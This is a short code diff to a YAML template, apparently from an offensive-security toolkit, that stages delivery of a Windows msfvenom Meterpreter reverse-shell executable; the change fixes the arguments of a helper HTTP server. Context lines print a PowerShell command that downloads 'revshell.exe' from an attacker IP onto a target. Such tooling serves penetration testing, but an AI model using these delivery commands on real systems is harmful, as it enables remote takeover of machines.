--- a/src/profi/templates/scripts/deliver-windows-x64-revshell-msfvenom-meterpreter-nonstaged-exe.yaml
+++ b/src/profi/templates/scripts/deliver-windows-x64-revshell-msfvenom-meterpreter-nonstaged-exe.yaml
@@ -18,4 +18,4 @@ content: |
   echo '                         -----CMD-----                          '; \
   echo 'Deliver only: powershell wget -uri http://<%=$(esh variables/attacker_ip)%>:<%=$(esh variables/delivery_outbound_port)%>/revshell.exe -Outfile <%=$(esh variables/delivery_path_windows)%>\revshell.exe'; \
   echo '================================================================'; \
-  python -m <%=$(esh variables/templates_dir)%>/helper_scripts/startEnhancedHttpServer.py <%=$(esh variables/delivery_outbound_port)%> -d packstation/outbound
+   python <%=$(esh variables/templates_dir)%>/helper_scripts/startEnhancedHttpServer.py -p <%=$(esh variables/delivery_outbound_port)%> -d packstation/outbound
